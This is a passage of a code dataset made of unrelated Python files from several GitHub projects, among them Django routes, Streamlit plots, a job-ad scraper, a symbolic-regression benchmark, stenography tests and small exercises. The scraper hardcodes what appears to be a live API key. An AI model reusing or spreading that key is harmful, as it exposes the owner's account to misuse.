basename='videodislike')\nrouter.register(r'channel', SubscriptionViewset, basename = 'channel')\nrouter.register(r'videosliked', VideosLikedViewset, basename='videosliked')\nrouter.register(r'view', ViewsViewset, basename = 'view')\nrouter.register(r'videosViewed', VideosViewedViewset, basename='videosViewed')\nrouter.register(r'feed', FeedViewset, basename = 'feed')\nrouter.register(r'videoRecommended', VideoRecommendedViewset, basename='videoRecommended')\nrouter.register(r'channelRecommended', ChannelRecommendedViewset, basename = 'channelRecommended')\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^', include(router.urls)),\n url(r'docs/', include_docs_urls(title=\"Backend\")),\n path('login/', LoginViewset.as_view(), name='token_obtain_pair'),\n]\n","repo_name":"jesse-zwd/itube-backend","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71705793080","text":"from typing import Any, Dict\n\nimport plotly.graph_objects as go\nimport streamlit as st\nfrom streamlit_prophet.lib.exposition.preparation import get_cv_dates_dict, get_hover_template_cv\n\n\ndef plot_cv_dates(\n cv_dates: Dict[Any, Any], resampling: Dict[Any, Any], style: Dict[Any, Any]\n) -> go.Figure:\n \"\"\"Creates a plotly bar plot showing training and validation dates for each cross-validation fold.\n\n Parameters\n ----------\n cv_dates : Dict\n Dictionary containing training and validation dates of each cross-validation fold.\n resampling : Dict\n Resampling specifications (granularity, dataset frequency).\n style : Dict\n Style specifications for the graph (colors).\n\n Returns\n -------\n go.Figure\n Plotly bar plot showing training and validation dates for each cross-validation fold.\n \"\"\"\n hover_data, hover_template = get_hover_template_cv(cv_dates, resampling)\n fig = go.Figure()\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n x=[cv_dates[fold][\"val_end\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][1], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n x=[cv_dates[fold][\"train_start\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][0], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n x=[cv_dates[fold][\"train_end\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][0], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.update_layout(\n showlegend=False,\n barmode=\"overlay\",\n xaxis_type=\"date\",\n title_text=\"Cross-Validation Folds\",\n title_x=0.5,\n title_y=0.85,\n )\n return fig\n\n\ndef display_expander(\n readme: Dict[Any, Any], section: str, title: str, add_blank: bool = False\n) -> None:\n \"\"\"Displays a streamlit expander with information about a section of the dashboard.\n\n Parameters\n ----------\n readme : Dict\n Dictionary containing explanations about the section.\n section : str\n Section of the dashboard on top of which the expander will be displayed.\n title : str\n Title for the expander.\n add_blank : bool\n Whether or not to add a blank after the expander.\n \"\"\"\n with st.expander(title, expanded=False):\n st.write(readme[\"plots\"][section])\n st.write(\"\")\n if add_blank:\n st.write(\"\")\n st.write(\"\")\n\n\ndef display_expanders_performance(\n use_cv: bool,\n dates: Dict[Any, Any],\n resampling: Dict[Any, Any],\n style: Dict[Any, Any],\n readme: Dict[Any, Any],\n) -> None:\n \"\"\"Displays a streamlit expander with information about performance section.\n\n Parameters\n ----------\n use_cv : bool\n Whether or not cross-validation is used.\n dates : Dict\n Dictionary containing cross-validation dates information.\n resampling : Dict\n Resampling specifications (granularity, dataset frequency).\n style : Dict\n Style specifications for the graph (colors).\n readme : Dict\n Dictionary containing explanations about the section.\n \"\"\"\n st.write(\"\")\n with st.expander(\"More info on evaluation metrics\", expanded=False):\n st.write(readme[\"plots\"][\"metrics\"])\n st.write(\"\")\n _display_metrics()\n st.write(\"\")\n if use_cv:\n cv_dates = get_cv_dates_dict(dates, resampling)\n with st.expander(\"See cross-validation folds\", expanded=False):\n st.plotly_chart(plot_cv_dates(cv_dates, resampling, style))\n\n\ndef _display_metrics() -> None:\n \"\"\"Displays formulas for all performance metrics.\"\"\"\n if st.checkbox(\"Show metric formulas\", value=False):\n st.write(\"If N is the number of distinct dates in the evaluation set:\")\n st.latex(r\"MAPE = \\dfrac{1}{N}\\sum_{t=1}^{N}|\\dfrac{Truth_t - Forecast_t}{Truth_t}|\")\n st.latex(r\"RMSE = \\sqrt{\\dfrac{1}{N}\\sum_{t=1}^{N}(Truth_t - Forecast_t)^2}\")\n st.latex(\n r\"SMAPE = \\dfrac{1}{N}\\sum_{t=1}^{N}\\dfrac{2|Truth_t - Forecast_t]}{|Truth_t| + |Forecast_t|}\"\n )\n st.latex(r\"MSE = \\dfrac{1}{N}\\sum_{t=1}^{N}(Truth_t - Forecast_t)^2\")\n st.latex(r\"MAE = \\dfrac{1}{N}\\sum_{t=1}^{N}|Truth_t - Forecast_t|\")\n","repo_name":"artefactory/streamlit_prophet","sub_path":"streamlit_prophet/lib/exposition/expanders.py","file_name":"expanders.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"40"} +{"seq_id":"7742775873","text":"import json, os, sys, operator\nfrom pip._vendor import requests\nfrom slugify import Slugify\n\nproj = os.path.dirname(os.path.abspath('manage.py'))\nsys.path.append(proj)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'Hela_robot.settings'\n\nimport django\n\ndjango.setup()\n\nfrom plats_bank.models import City, Job_type, Job_ad\n\napi_key = \"YicmXHhlMFx4ZGRceDgxXHg4ZVx4ZDZpXHhjMlx4YjFceGYwXHgxZS5ceGFhXHhjNFx4OGVqXV1ceGFmXHg5OCc\"\ncity_list_url = \"https://taxonomy.api.jobtechdev.se/v1/taxonomy/specific/concepts/municipality?include-legacy-information=true&include-deprecated=false&deprecated=false\"\njobb_type_list_url = \"https://taxonomy.api.jobtechdev.se/v1/taxonomy/specific/concepts/ssyk?include-legacy-information=false&include-deprecated=false&deprecated=false&relation=related\"\njob_ads_url = \"https://jobsearch.api.jobtechdev.se/search?\"\nheaders = {'api-key': api_key, 'accept': 'application/json', 'x-feature-disable-smart-freetext': 'false',\n 'x-feature-enable-false-negative': 'false'\n }\n\n\ndef test_search_loop_through_hits():\n response = requests.get(city_list_url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n hits = json_response\n for hit in hits:\n try:\n city_name = hit['taxonomy/definition']\n lau_2_code_2015 = hit['taxonomy/lau-2-code-2015']\n City(name=city_name, lau_2_code_2015=lau_2_code_2015).save()\n except django.db.utils.IntegrityError:\n print(\"City allready exsist\")\n\n\ndef jobb_type_list_maker():\n response = requests.get(jobb_type_list_url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n hits = json_response\n for hit in hits:\n # print(hit)\n definition = hit['taxonomy/definition']\n af_id = hit['taxonomy/id']\n name = hit['taxonomy/preferred-label']\n ssyk_code_2012 = hit['taxonomy/ssyk-code-2012']\n print(name + '->' + af_id)\n try:\n Job_type(definition=definition, name=name, ssyk_code_2012=ssyk_code_2012, af_id=af_id).save()\n except django.db.utils.IntegrityError:\n print(\"Jobb type allready exsist\")\n\n\ndef job_ads_url_maker(lau_2_code_2015, af_id):\n job_ads_url = 'https://jobsearch.api.jobtechdev.se/search?'\n q = 'occupation-group=' + af_id + '&municipality=' + lau_2_code_2015 + '&offset=0&limit=100'\n return job_ads_url + q\n\n\ndef job_ad_finder():\n # citys = City.objects.all()\n citys = ['1480']\n for city_obj in citys:\n job_types = Job_type.objects.all()\n for job_type in job_types:\n job_type_code = str(job_type.af_id)\n # url = job_ads_url_maker(str(city_obj.lau_2_code_2015), job_type_code)\n url = job_ads_url_maker(str(city_obj), job_type_code)\n response = requests.get(url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n if json_response['total']['value'] > 0:\n # print(json_response['total']['value'])#print total\n # print(json_response['hits'])\n for hit in json_response['hits']:\n if hit['application_details']['url'] != None:\n # print(hit['application_details']['url'])#print anons url\n url = hit['application_details']['url']\n id = hit['id']\n title = hit['headline']\n description = hit['description']['text']\n company = hit['employer']['name']\n # city = City.objects.get(lau_2_code_2015=str(city_obj.lau_2_code_2015))\n city = City.objects.get(lau_2_code_2015=str(city_obj))\n job_type = (Job_type.objects.get(af_id=job_type_code))\n application_deadline = hit['application_deadline']\n try:\n print(title + \"==>\" + str(city))\n Job_ad(af_id=id,\n application_deadline=application_deadline,\n title=title,\n description=description,\n city=city,\n company=company,\n ad_url=url,\n job_type=job_type).save()\n except django.db.utils.IntegrityError:\n print(\"Annos allready added\")\n\n\ntest_search_loop_through_hits()\njobb_type_list_maker()\njob_ad_finder()\n","repo_name":"fdeh75/Hela_robot","sub_path":"create_new_db/create_new_db.py","file_name":"create_new_db.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31314909712","text":"import StackGP as sgp\nimport numpy as np\nimport time\n\n#Performance Test\ndef test(func, dimensions, ranges, numberOfPoints=100, numberOfTestsPoints=200):\n inputData=[]\n testInput=[]\n for i in range(dimensions):\n inputData.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfPoints))\n testInput.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfTestsPoints))\n inputData=np.array(inputData)\n testInput=np.array(testInput)\n response=func(inputData)\n testResponse=func(testInput)\n errors=[]\n models=[]\n minerr=1\n models1=sgp.evolve(inputData,response,initialPop=models,generations=1000,tracking=False,popSize=300,ops=sgp.allOps(),timeLimit=120,capTime=True,align=False,elitismRate=10)\n models2=sgp.evolve(inputData,response,initialPop=models,generations=1000,tracking=False,popSize=300,ops=sgp.allOps(),timeLimit=120,capTime=True,align=False,elitismRate=10)\n models=models1+models2\n models=sgp.selectModels(models,20)\n alignedModels=[sgp.alignGPModel(mods,inputData,response) for mods in models]\n fitList=np.array([sgp.fitness(mod,testInput,testResponse) for mod in alignedModels])\n minerr=min(fitList[np.logical_not(np.isnan(fitList))])\n return minerr, fitList\n\n#Speed Test\ndef speedTest(func, dimensions, ranges, numberOfPoints=100, numberOfTestsPoints=200):\n inputData=[]\n testInput=[]\n for i in range(dimensions):\n inputData.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfPoints))\n testInput.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfTestsPoints))\n inputData=np.array(inputData)\n testInput=np.array(testInput)\n response=func(inputData)\n testResponse=func(testInput)\n #Record start time\n start=time.time()\n models=sgp.evolve(inputData,response,generations=1000,popSize=300,ops=sgp.allOps(),capTime=False,align=True,elitismRate=10)\n #Record end time\n end=time.time()\n #Return time taken\n return end-start\n\ndef batches(func, dimensions, ranges, numberOfPoints=100, numberOfTestPoints=200, repeats=10):\n errs=[]\n for i in range(repeats):\n err,fit=test(func,dimensions,ranges,numberOfPoints,numberOfTestPoints)\n errs.append(err)\n return min(errs), np.median(errs), np.mean(errs), max(errs), np.std(errs)\n\ndef speedBatch(func,dimension,ranges,numberOfPoints=100,numberOfTestPoints=200,repeats=10):\n times=[]\n for i in range(repeats):\n times.append(speedTest(func,dimension,ranges,numberOfPoints,numberOfTestPoints))\n return min(times), np.median(times), np.mean(times), max(times), np.std(times)\n\n\nminerrs=[]\nmederrs=[]\nmeanerrs=[]\nmaxerrs=[]\nstd=[]\nfits=[]\n\n#Feynman EQ2\nf1=lambda data: (np.exp((-((data[0])/data[1])**2)/2)/(np.sqrt(2*np.pi)*data[1]))\nerr=batches(f1,2,[[1,3],[1,3]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ2\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ3\nf2=lambda data: (np.exp((-((data[0]-data[1])/data[2])**2)/2)/(np.sqrt(2*np.pi)*data[2]))\nerr=batches(f2,3,[[1,3],[1,3],[1,3]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ3\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ4\nf3=lambda data: (np.sqrt((data[1]-data[2])**2+(data[3]-data[2])**2))\nerr=batches(f3,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ4\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ91\nf4=lambda data: (data[0]*np.sqrt(data[1]**2+data[2]**2+data[3]**2))\nerr=batches(f4,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ91\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ27\nf5=lambda data: (1/(1/data[0]+data[1]/data[2]))\nerr=batches(f5,3,[[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ27\")\nprint(\"Error: \"+str(err))\n\n#Speed Test\nprint(\"Speed Test\")\nprint(\"Feynman EQ91\")\nspeed=speedBatch(f4,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nprint(\"Time: \"+str(speed))\n\n\nfile=open(\"BenchmarkResults.txt\",\"w+\")\nfile.write(\"Feynman EQ2\\n\")\nfile.write(\"Min Error: \"+str(minerrs[0])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[0])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[0])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[0])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[0])+\"\\n\")\nfile.write(\"Feynman EQ3\\n\")\nfile.write(\"Min Error: \"+str(minerrs[1])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[1])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[1])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[1])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[1])+\"\\n\")\nfile.write(\"Feynman EQ4\\n\")\nfile.write(\"Min Error: \"+str(minerrs[2])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[2])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[2])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[2])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[2])+\"\\n\")\nfile.write(\"Feynman EQ91\\n\")\nfile.write(\"Min Error: \"+str(minerrs[3])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[3])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[3])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[3])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[3])+\"\\n\")\nfile.write(\"Feynman EQ27\\n\")\nfile.write(\"Min Error: \"+str(minerrs[4])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[4])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[4])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[4])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[4])+\"\\n\")\nfile.write(\"Speed Test\\n\")\nfile.write(\"Min Time: \"+str(speed[0])+\"\\n\")\nfile.write(\"Median Time: \"+str(speed[1])+\"\\n\")\nfile.write(\"Mean Time: \"+str(speed[2])+\"\\n\")\nfile.write(\"Max Time: \"+str(speed[3])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(speed[4])+\"\\n\")\nfile.close()\n\n\n\n\n","repo_name":"hoolagans/StackGP","sub_path":"Benchmark.py","file_name":"Benchmark.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31633408250","text":"import unittest\nfrom ensure import ensure\nfrom stroke_dictionary_creator.generators.generators import *\nimport itertools\nimport stroke_dictionary_creator.stroke_parser as stroke_parser\n\nclass TestGenerators(unittest.TestCase):\n def test_middle_vowel(self):\n ensure(middle_vowel.parse(\"a\")).equals(\"A\")\n ensure(middle_vowel.parse(\"e\")).equals(\"E\")\n ensure(middle_vowel.parse(\"i\")).equals(\"I\")\n ensure(middle_vowel.parse(\"o\")).equals(\"O\")\n ensure(middle_vowel.parse(\"u\")).equals(\"AO\")\n ensure(middle_vowel.parse(\"y\")).equals(\"AO\")\n ensure(middle_vowel.parse(\"ä\")).equals(\"A\")\n ensure(middle_vowel.parse(\"ö\")).equals(\"O\")\n\n def test_end_vowel(self):\n ensure(end_vowel.parse(\"e\")).equals(\"e\")\n ensure(end_vowel.parse(\"o\")).equals(\"o\")\n ensure(end_vowel.parse(\"ö\")).equals(\"o\")\n ensure(end_vowel.parse(\"i\")).equals(\"i\")\n ensure(end_vowel.parse(\"u\")).equals(\"eo\")\n ensure(end_vowel.parse(\"y\")).equals(\"eo\")\n\n ensure(end_vowel.parse(\"a\")).equals(\"\")\n ensure(end_vowel.parse(\"ä\")).equals(\"\")\n\n def test_initial_consonant(self):\n ensure(initial_consonant.parse(\"g\")).equals(\"TKPV\")\n ensure(initial_consonant.parse(\"j\")).equals(\"SKVR\")\n ensure(initial_consonant.parse(\"d\")).equals(\"TK\")\n ensure(initial_consonant.parse(\"b\")).equals(\"PV\")\n ensure(initial_consonant.parse(\"q\")).equals(\"KV\")\n ensure(initial_consonant.parse(\"m\")).equals(\"PH\")\n ensure(initial_consonant.parse(\"y\")).equals(\"KVR\")\n ensure(initial_consonant.parse(\"y\")).equals(\"KVR\")\n ensure(initial_consonant.parse(\"l\")).equals(\"HR\")\n\n ensure(initial_consonant.parse(\"s\")).equals(\"S\")\n ensure(initial_consonant.parse(\"t\")).equals(\"T\")\n ensure(initial_consonant.parse(\"k\")).equals(\"K\")\n ensure(initial_consonant.parse(\"p\")).equals(\"P\")\n ensure(initial_consonant.parse(\"v\")).equals(\"V\")\n ensure(initial_consonant.parse(\"h\")).equals(\"H\")\n ensure(initial_consonant.parse(\"r\")).equals(\"R\")\n\n def test_middle_diphtong(self):\n ensure(middle_diphtong.parse(\"ae\")).equals(\"AE\")\n ensure(middle_diphtong.parse(\"äe\")).equals(\"AE\")\n ensure(middle_diphtong.parse(\"ai\")).equals(\"AI\")\n ensure(middle_diphtong.parse(\"äi\")).equals(\"AI\")\n ensure(middle_diphtong.parse(\"ue\")).equals(\"AOE\")\n ensure(middle_diphtong.parse(\"ye\")).equals(\"AOE\")\n ensure(middle_diphtong.parse(\"ui\")).equals(\"AOI\")\n ensure(middle_diphtong.parse(\"yi\")).equals(\"AOI\")\n ensure(middle_diphtong.parse(\"ei\")).equals(\"EI\")\n\n ensure(middle_diphtong.parse(\"ea\")).equals(\"A*E\")\n ensure(middle_diphtong.parse(\"eä\")).equals(\"A*E\")\n\n ensure(middle_diphtong.parse(\"ia\")).equals(\"A*I\")\n ensure(middle_diphtong.parse(\"iä\")).equals(\"A*I\")\n\n ensure(middle_diphtong.parse(\"eu\")).equals(\"AO*E\")\n ensure(middle_diphtong.parse(\"ey\")).equals(\"AO*E\")\n\n ensure(middle_diphtong.parse(\"iu\")).equals(\"AO*I\")\n ensure(middle_diphtong.parse(\"iy\")).equals(\"AO*I\")\n\n ensure(middle_diphtong.parse(\"ie\")).equals(\"*EI\")\n\n def test_end_diphtong(self):\n ensure(end_diphtong.parse(\"ei\")).equals(\"ei\")\n ensure(end_diphtong.parse(\"eo\")).equals(\"eo\")\n ensure(end_diphtong.parse(\"eö\")).equals(\"eo\")\n ensure(end_diphtong.parse(\"ea\")).equals(\"ea\")\n ensure(end_diphtong.parse(\"eä\")).equals(\"ea\")\n ensure(end_diphtong.parse(\"ui\")).equals(\"eoi\")\n ensure(end_diphtong.parse(\"yi\")).equals(\"eoi\")\n ensure(end_diphtong.parse(\"ua\")).equals(\"eoa\")\n ensure(end_diphtong.parse(\"yä\")).equals(\"eoa\")\n ensure(end_diphtong.parse(\"oi\")).equals(\"oi\")\n ensure(end_diphtong.parse(\"öi\")).equals(\"oi\")\n ensure(end_diphtong.parse(\"oa\")).equals(\"oa\")\n ensure(end_diphtong.parse(\"öä\")).equals(\"oa\")\n\n # This is an exception to the rule.\n # The intention is to write words like \"kulkija\" (traveller) with a\n # single stroke.\n ensure(end_diphtong.parse(\"ja\")).equals(\"ia\")\n ensure(end_diphtong.parse(\"jä\")).equals(\"ia\")\n\n def test_end_triphtong(self):\n ensure(end_triphtong.parse(\"ija\")).equals(\"eia\")\n ensure(end_triphtong.parse(\"ijä\")).equals(\"eia\")\n ensure(end_triphtong.parse(\"uja\")).equals(\"eoia\")\n ensure(end_triphtong.parse(\"yjä\")).equals(\"eoia\")\n ensure(end_triphtong.parse(\"oja\")).equals(\"oia\")\n ensure(end_triphtong.parse(\"öjä\")).equals(\"oia\")\n\n def test_final_consonant(self):\n ensure(final_consonant.parse(\"l\")).equals(\"NST\")\n ensure(final_consonant.parse(\"m\")).equals(\"SH\")\n ensure(final_consonant.parse(\"p\")).equals(\"HR\")\n ensure(final_consonant.parse(\"v\")).equals(\"SR\")\n\n ensure(final_consonant.parse(\"n\")).equals(\"N\")\n ensure(final_consonant.parse(\"k\")).equals(\"K\")\n ensure(final_consonant.parse(\"s\")).equals(\"S\")\n ensure(final_consonant.parse(\"h\")).equals(\"H\")\n ensure(final_consonant.parse(\"t\")).equals(\"T\")\n ensure(final_consonant.parse(\"r\")).equals(\"R\")\n\n def test_long_vowel(self):\n ensure(long_vowel.parse(\"aa\")).equals(\"A*\")\n ensure(long_vowel.parse(\"ää\")).equals(\"A*\")\n ensure(long_vowel.parse(\"uu\")).equals(\"AO*\")\n ensure(long_vowel.parse(\"yy\")).equals(\"AO*\")\n ensure(long_vowel.parse(\"oo\")).equals(\"O*\")\n ensure(long_vowel.parse(\"öö\")).equals(\"O*\")\n ensure(long_vowel.parse(\"ee\")).equals(\"*E\")\n ensure(long_vowel.parse(\"ii\")).equals(\"*I\")\n\n def test_final_two_consonants(self):\n # try all combinations of 2 final consonants, and see that the stroke\n # parser is able to parse all combinations that final_two_consonants\n # reports as valid. stroke_parser is thus the reference implementation\n # that is presumed correct.\n consonants = \"NKSHTR\"\n combinations = self.key_combinations(consonants)\n\n for comb in combinations:\n stroke_parser_result = self.parse_or_none(stroke_parser.end_keys, comb)\n final_two_consonants_result = self.parse_or_none(final_two_consonants,\n comb.lower())\n\n ensure(stroke_parser_result).equals(final_two_consonants_result)\n\n def key_combinations(self, keys):\n combinations = itertools.combinations(keys, 2)\n return list(map(lambda c: \"\".join(c), combinations))\n\n def parse_or_none(self, p, input_string):\n try:\n return p.parse(input_string)\n except Exception as e:\n return None\n\n def test_final_double_consonant(self):\n ensure(final_double_consonant.parse(\"nn\")).equals(\"NKS\")\n ensure(final_double_consonant.parse(\"kk\")).equals(\"NKH\")\n ensure(final_double_consonant.parse(\"mm\")).equals(\"KSH\")\n ensure(final_double_consonant.parse(\"ss\")).equals(\"NSH\")\n ensure(final_double_consonant.parse(\"rr\")).equals(\"HTR\")\n ensure(final_double_consonant.parse(\"pp\")).equals(\"SHR\")\n ensure(final_double_consonant.parse(\"tt\")).equals(\"STR\")\n\n def end_vocal_sound(self):\n ensure(end_vocal_sound.parse(\"a\")).equals(\"\")\n ensure(end_vocal_sound.parse(\"ä\")).equals(\"\")\n ensure(end_vocal_sound.parse(\"ei\")).equals(\"ei\")\n ensure(end_vocal_sound.parse(\"ijä\")).equals(\"eia\")\n ensure(end_vocal_sound.parse(\"iä\")).equals(\"ia\")\n ensure(end_vocal_sound.parse(\"ia\")).equals(\"ia\")\n","repo_name":"sp3ctum/plover-finnish","sub_path":"stroke_dictionary_creator/stroke_dictionary_creator/generators/test_generators.py","file_name":"test_generators.py","file_ext":"py","file_size_in_byte":7530,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20394612455","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('register', views.register),\n path('login', views.login),\n path('account/<int:id>', views.account),\n path('home', views.home),\n path('editaccount', views.editaccount),\n path('editpw', views.editpw),\n path('library', views.library),\n path('logout', views.logout),\n]","repo_name":"claudia-qr/group_project_podcast_shuffle","sub_path":"shuffle_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12951167256","text":"#Finds a largest increasing subsequence in O(n^2) time\n#algorithm at http://www.algorithmist.com/index.php/Longest_Increasing_Subsequence\ndef LongestSubsequence(array):\n n=len(array)\n q=[0]*n\n prevHigh=[-1]*n # Contains all the previos elements to the increasing sequence\n \n for i in range(n):\n maxLen=0\n for j in range(i):\n if array[i]>array[j] :\n if q[j]>maxLen :\n maxLen=q[j]\n prevHigh[i]=j\n\n q[i]=maxLen+1\n \n idx=q.index(max(q))\n seq=[]\n while(idx!=-1):\n seq=[array[idx]]+seq\n idx=prevHigh[idx]\n \n return seq\n \ndef main():\n print(LongestSubsequence([4,2,6,1,9,0,11,7,12]))\n \n \nif __name__=='__main__':\n main()","repo_name":"mailpraveens/Python-Experiments","sub_path":"Algorithm and solutions/LongestIncreasingSubsequence.py","file_name":"LongestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30816439257","text":"import statistics\nimport os\nimport time\ni = 0\nj = 0\ndef buscarmaximo():\n buscarmax = max([1, 2, 27, 7])\n print(\"El maximo valor es: \", buscarmax)\n os.system(\"pause\")\n menu()\ndef buscarminimo():\n buscarmin = min([1, 2, 27, 7])\n print(\"el minimo valor es: \", buscarmin)\n os.system(\"pause\")\n menu()\ndef buscarpromedio():\n promedio = statistics.mean([1, 2, 27, 7])\n print(\"El promedio de los valores es: \", promedio)\n os.system(\"pause\")\n menu()\ndef matrizsuma():\n matriza= ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizb = ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizr = ([[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]])\n for i in range(3):\n for j in range(3):\n matrizr[i][j] = matriza[i][j] + matrizb[i][j]\n print(\"Primera matriz: \", matriza)\n print(\"Segunda matriz: \", matrizb)\n print(\"matriz resultante: \", matrizr)\n os.system(\"pause\")\n menu()\ndef matrizescalar():\n matriza = ([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n matrizr = ([[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]])\n prod = int(input(\"Valor de la contante escalar: \"))\n for i in range(3):\n for j in range(3):\n matrizr[i][j] = matriza[i][j] * prod\n print (\"Matriz resultante: \", matrizr)\n os.system(\"pause\")\n menu()\ndef menu():\n opcion = 0\n print(\"\"\"\n 1 - Buscar numero maximo\n 2 - Buscar numero minimo\n 3 - Sacar el promedio\n 4 - Sumar matrices\n 5 - Multiplicar matriz escalar\n 6 - Salir\"\"\")\n while (opcion != 6):\n opcion = int(input(\"Ingrese opción: \"))\n if opcion == 1:\n buscarmaximo()\n elif opcion == 2:\n buscarminimo()\n elif opcion == 3:\n buscarpromedio()\n elif opcion == 4:\n matrizsuma()\n elif opcion == 5:\n matrizescalar()\n elif opcion == 6:\n print(\"\"\"Seguro que desea salir?\n Si No\"\"\")\n salir = (str(input(\"Opción: \")))\n if (salir == 'si' or salir == 'Si' or salir == 'SI' or salir == 'sI'):\n print(\"MAIAMEEEE\")\n quit()\n else:\n menu()\n else:\n print('Opcion Incorrecta')\n time.sleep(1)\n menu()\nprint(\"\"\"\nMenú ejercicios - funciones, vectores - Tomás Cosentino\n\"\"\")\nmenu()","repo_name":"TomasCosen/Ejercicios","sub_path":"Ejercicios funciones vectores/Phyton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69859112442","text":"# Вычисление суммы цифр числа\n\ndef dig_sum(number):\n \"\"\"Return sum of digits\"\"\"\n if number < 0:\n number = abs(number)\n if number > 9:\n dig = number % 10\n rem = number // 10\n return dig + dig_sum(rem)\n else:\n return number\n","repo_name":"Alexander-Ageev/Exercises","sub_path":"Recursion/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8358535787","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport numpy as np\nimport urllib.request, json\nimport pandas as pd\nimport scipy\nfrom sklearn.svm import SVC\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import train_test_split\nimport xlrd\n\n\n\n\nwin = tk.Tk()\n\nwin.title(\"Vitech\")\n\nml2 